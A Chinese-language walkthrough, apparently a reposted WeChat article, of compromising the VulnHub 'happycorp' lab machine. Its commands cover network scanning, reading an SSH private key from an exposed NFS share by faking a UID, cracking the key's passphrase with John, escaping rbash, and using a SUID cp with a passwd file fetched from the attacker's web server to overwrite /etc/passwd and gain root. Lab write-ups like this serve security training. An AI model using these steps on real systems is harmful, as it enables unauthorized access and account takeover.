本周实践的是vulnhub的happycorp镜像,
下载地址,https://download.vulnhub.com/happycorp/happycorp1.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.131.0/24,
获取到靶机地址是192.168.131.135,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.131.135,
发现靶机开了22端口的ssh服务,80端口的http服务,2049端口的nfs服务,
查看nfs的文件共享目录,showmount -e 192.168.131.135,
获取到/home/karl,在kali攻击机上创建映射目录mkdir /tmp/kali,
远程挂过去,sudo mount -t nfs 192.168.131.135:/home/karl /tmp/kali,进入映射目录,cd /tmp/kali,查询目录下内容,ls -la,
尝试进入.ssh目录,发现没权限,cd .ssh,
看到当前需要的权限是1001,那就自己创建,
先创建组,sudo groupadd --gid 1001 testgroup,
再创建用户,sudo useradd --uid 1001 --group testgroup test,
以test用户权限查看,sudo -u test ls -l .ssh,没问题,
继续查看到私钥内容,sudo -u test cat .ssh/id_rsa,
回到kali的home下,cd /home/kali,创建key文件,vim key,
ssh登录,ssh -i key [email protected],发现要密码,
私钥文件转可被破解的hash,ssh2john key,放到passphrase文件里,
暴破,john --wordlist=/usr/share/wordlists/rockyou.txt passphrase,获取到密码sheep,
再次ssh登录,发现用的rbash,
重新登录,ssh -i key [email protected] -t "/bin/sh",
查找root权限程序,find / -perm -u=s -type f 2>/dev/null,
获取到/bin/cp,先查看到密码文件内容,
kali上创建新的密码文件,vim passwd,加入root权限的账号,
kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,
回到靶机,进入临时目录,cd /tmp,
下载密码文件,wget http://192.168.131.128:8000/passwd,
拷贝覆盖真正的密码文件,cp passwd /etc/passwd,
切到root权限的账号,su hacker,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之happycorp的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论